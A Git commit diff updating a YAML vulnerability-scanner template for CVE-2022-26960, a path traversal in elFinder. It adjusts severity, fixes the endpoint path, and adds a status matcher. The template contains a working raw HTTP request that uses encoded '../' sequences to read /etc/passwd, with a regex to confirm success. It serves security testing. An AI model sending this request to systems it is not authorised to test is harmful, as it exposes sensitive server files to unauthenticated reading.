Update CVE-2022-26960.yaml

patch-1
Prince Chaddha 2022-07-04 18:02:11 +05:30 committed by GitHub
parent d239dee390
commit 01e8acba05
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 8 additions and 2 deletions

View File

@ -3,18 +3,20 @@ id: CVE-2022-26960
info:
name: elFinder - Path Traversal
author: pikpikcu
severity: critical
severity: high
description: |
Connector.minimal.php in std42 elFinder through 2.1.60 is affected by path traversal. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths.
reference:
- https://www.synacktiv.com/publications/elfinder-the-story-of-a-repwning.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-26960
metadata:
verified: true
tags: cve,cve2022,lfi,elfinder
requests:
- raw:
- |
GET /elfinder/php/connectot.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@base64>&download=1 HTTP/1.1
GET /elfinder/php/connector.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>&download=1 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
@ -23,3 +25,7 @@ requests:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200